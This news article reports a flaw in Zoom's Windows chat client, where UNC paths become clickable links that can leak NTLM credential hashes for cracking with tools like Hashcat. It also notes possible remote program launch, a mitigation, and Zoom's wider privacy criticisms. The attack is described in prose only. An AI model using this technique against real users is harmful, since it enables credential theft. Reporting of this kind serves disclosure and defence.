Zoom is enjoying an astronomical increase in its daily user base, but that increased attention has also meant increased scrutiny and criticism about how it handles transparency, security, and data collection. Last week, Twitter user Mitch (@_g0dmode) pointed out a vulnerability in the Zoom client's URL conversion application, claiming that it could expose Window logins and passwords. On Tuesday, BleepingComputer looked into the issue and confirmed that it's possible to not only compromise credentials, but even to launch programs on unsuspecting users' computers.
UNC path injection and leak — Whenever you send a URL through Zoom's messaging feature, the client converts it into a link. It does the same for UNC paths. The problem is that when someone clicks that converted link, Windows will attempt to connect them to that remote site with the help of SMB file-sharing protocol. When this happens, Windows sends the account's login and NTLM password, and those can be cracked. Freely available tools like Hashcat can help hackers easily reveal the corresponding credentials. Yikes.
16 Seconds and you're in — Both BleepingComputer and @_g0dmode outline how easily this flaw can be exploited. How quickly credentials can be figured out depends on the complexity of the password used for the account. In one case, BleepingComputer dehashed a "fairly easy password" in about 16 seconds.
On top of path injection, hackers can launch programs remotely. The only consolation in this scenario, however, is that Windows notifies its users before a program is opened.
What Zoom needs to do — The problem lies in Zoom's chat feature. The client shouldn't automatically convert UNC paths into easily accessible links. So far, the company hasn't deployed any corrective measures, but if you already use Zoom and Windows and want to mitigate your risk, BleepingComputer suggests that you enable a Group Policy fix, which you can read about in its official report.
Automatic link conversions leading to credential leaks isn't the only problem Zoom has right now. The company is under considerable public scrutiny over how it lets corporate-tier administrators (also known as hosts) practice far more autonomy than attendees. From its attention tracking tool and data collection practices to hosts being able to access personal data like operating system information, location data, audiovisual specs, and more, the widely used video-conferencing tool has major work to do.